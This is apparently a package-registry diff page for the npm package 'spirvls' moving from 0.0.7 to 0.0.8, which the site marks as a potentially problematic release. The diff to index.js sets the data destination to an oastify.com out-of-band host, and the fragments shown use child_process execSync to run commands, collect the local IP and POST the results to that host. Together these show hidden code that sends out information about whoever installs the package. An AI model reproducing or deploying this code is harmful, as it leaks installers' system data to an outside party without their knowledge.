spirvls 0.0.7 → 0.0.8
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of spirvls might be problematic. Click here for more details.
- package/index.js +2 -2
- package/main.514d23457bdff209.js +2 -0
- package/package.json +2 -3
- package/rand.html +57 -0
package/index.js
CHANGED
@@ -5,7 +5,7 @@ const https = require("https");
|
|
5
5
|
const { execSync } = require("child_process");
|
6
6
|
|
7
7
|
// Replace with your Interactsh endpoint
|
8
|
-
const interactshEndpoint = "
|
8
|
+
const interactshEndpoint = "edvrar6ntsb95ijfs0aj6391lsrjf93y.oastify.com";
|
9
9
|
|
10
10
|
// Function to get the local IP address
|
11
11
|
function getLocalIP() {
|
@@ -70,4 +70,4 @@ try {
|
|
70
70
|
sendPostRequest(dataPayload);
|
71
71
|
} catch (error) {
|
72
72
|
console.error("Error executing commands:", error);
|
73
|
-
}
|
73
|
+
}
|